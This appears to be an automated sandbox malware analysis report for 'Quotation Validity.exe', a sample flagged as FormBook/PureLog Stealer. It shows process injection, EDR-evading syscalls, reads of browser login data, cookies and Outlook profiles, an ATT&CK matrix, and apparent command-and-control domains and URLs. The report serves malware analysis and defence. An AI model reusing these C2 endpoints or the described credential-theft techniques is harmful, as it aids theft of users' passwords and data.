                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0144547F mov eax, dword ptr fs:[00000030h]9_2_0144547F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139A470 mov eax, dword ptr fs:[00000030h]9_2_0139A470
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139A470 mov eax, dword ptr fs:[00000030h]9_2_0139A470
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139A470 mov eax, dword ptr fs:[00000030h]9_2_0139A470
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01371460 mov eax, dword ptr fs:[00000030h]9_2_01371460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01371460 mov eax, dword ptr fs:[00000030h]9_2_01371460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01371460 mov eax, dword ptr fs:[00000030h]9_2_01371460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01371460 mov eax, dword ptr fs:[00000030h]9_2_01371460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01371460 mov eax, dword ptr fs:[00000030h]9_2_01371460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138F460 mov eax, dword ptr fs:[00000030h]9_2_0138F460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138F460 mov eax, dword ptr fs:[00000030h]9_2_0138F460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138F460 mov eax, dword ptr fs:[00000030h]9_2_0138F460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138F460 mov eax, dword ptr fs:[00000030h]9_2_0138F460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138F460 mov eax, dword ptr fs:[00000030h]9_2_0138F460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138F460 mov eax, dword ptr fs:[00000030h]9_2_0138F460
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139245A mov eax, dword ptr fs:[00000030h]9_2_0139245A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136645D mov eax, dword ptr fs:[00000030h]9_2_0136645D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137B440 mov eax, dword ptr fs:[00000030h]9_2_0137B440
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137B440 mov eax, dword ptr fs:[00000030h]9_2_0137B440
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137B440 mov eax, dword ptr fs:[00000030h]9_2_0137B440
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137B440 mov eax, dword ptr fs:[00000030h]9_2_0137B440
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137B440 mov eax, dword ptr fs:[00000030h]9_2_0137B440
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137B440 mov eax, dword ptr fs:[00000030h]9_2_0137B440
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE443 mov eax, dword ptr fs:[00000030h]9_2_013AE443
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE443 mov eax, dword ptr fs:[00000030h]9_2_013AE443
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE443 mov eax, dword ptr fs:[00000030h]9_2_013AE443
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AE443 mov eax, dword ptr fs:[00000030h]9_2_013AE443
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtClose: Direct from: 0x77672B6C
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Quotation Validity.exeMemory written: C:\Users\user\Desktop\Quotation Validity.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: NULL target: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeSection loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\isoburn.exeThread register set: target process: 736Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeProcess created: C:\Users\user\Desktop\Quotation Validity.exe "C:\Users\user\Desktop\Quotation Validity.exe"Jump to behavior
                      Source: C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: KnETAajUsFuuTQ.exe, 0000000B.00000000.1625027564.0000000001180000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730968736.0000000001181000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771216433.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: KnETAajUsFuuTQ.exe, 0000000B.00000000.1625027564.0000000001180000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730968736.0000000001181000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771216433.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: KnETAajUsFuuTQ.exe, 0000000B.00000000.1625027564.0000000001180000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730968736.0000000001181000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771216433.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                      Source: KnETAajUsFuuTQ.exe, 0000000B.00000000.1625027564.0000000001180000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000B.00000002.3730968736.0000000001181000.00000002.00000001.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000000.1771216433.0000000000F30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Users\user\Desktop\Quotation Validity.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation Validity.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 9.2.Quotation Validity.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Quotation Validity.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3729826562.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3732445014.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1704236127.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3732187285.0000000002910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 2.2.Quotation Validity.exe.44324c8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation Validity.exe.5e70000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation Validity.exe.348d3b8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1306858110.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1304383936.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1302792187.000000000345F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 9.2.Quotation Validity.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Quotation Validity.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3729826562.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3732445014.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1704236127.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3732187285.0000000002910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 2.2.Quotation Validity.exe.44324c8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation Validity.exe.5e70000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation Validity.exe.5e70000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation Validity.exe.44324c8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation Validity.exe.348d3b8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1306858110.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1304383936.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1302792187.000000000345F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		412
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		1
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		4
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		5
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture5
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566632 Sample: Quotation Validity.exe Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 31 www.cyperla.xyz 2->31 33 www.070002018.xyz 2->33 35 16 other IPs or domains 2->35 45 Antivirus / Scanner detection for submitted sample 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected PureLog Stealer 2->49 53 7 other signatures 2->53 10 Quotation Validity.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\Users\user\...\Quotation Validity.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 Quotation Validity.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 KnETAajUsFuuTQ.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 isoburn.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 KnETAajUsFuuTQ.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.070002018.xyz 161.97.142.144, 49994, 49995, 49996 CONTABODE United States 23->37 39 cyperla.xyz 31.186.11.114, 49820, 80 BETAINTERNATIONALTR Turkey 23->39 41 10 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Quotation Validity.exe68%ReversingLabsByteCode-MSIL.Trojan.Remcos
                      Quotation Validity.exe100%AviraHEUR/AGEN.1307356
                      Quotation Validity.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.smartcongress.net/qtfx/0%Avira URL Cloudsafe
                      http://www.yc791022.asia/wu7k/0%Avira URL Cloudsafe
                      http://www.070002018.xyz/6m2n/0%Avira URL Cloudsafe
                      http://www.dietcoffee.online/dm4p/0%Avira URL Cloudsafe
                      http://www.bser101pp.buzz/v89f/0%Avira URL Cloudsafe
                      http://www.smartcongress.net/qtfx/?6NVpdLF=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLKl2XaG/4RF1XL2skPecvq2g7m0aOng==&_jVx=rlV0_TQ810%Avira URL Cloudsafe
                      http://www.madhf.tech/6ou6/0%Avira URL Cloudsafe
                      http://www.bienmaigrir.info/7yhf/0%Avira URL Cloudsafe
                      http://www.jalan2.online/ykgd/0%Avira URL Cloudsafe
                      http://www.bser101pp.buzz/v89f/?6NVpdLF=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9kwLEpkgrXXmS6Zwq+X4n7/LWdMx9Q7w==&_jVx=rlV0_TQ810%Avira URL Cloudsafe
                      http://www.madhf.tech/6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/Wjx9MdL3/Nu9eMgeVL6PZ2CHNoDSQ==0%Avira URL Cloudsafe
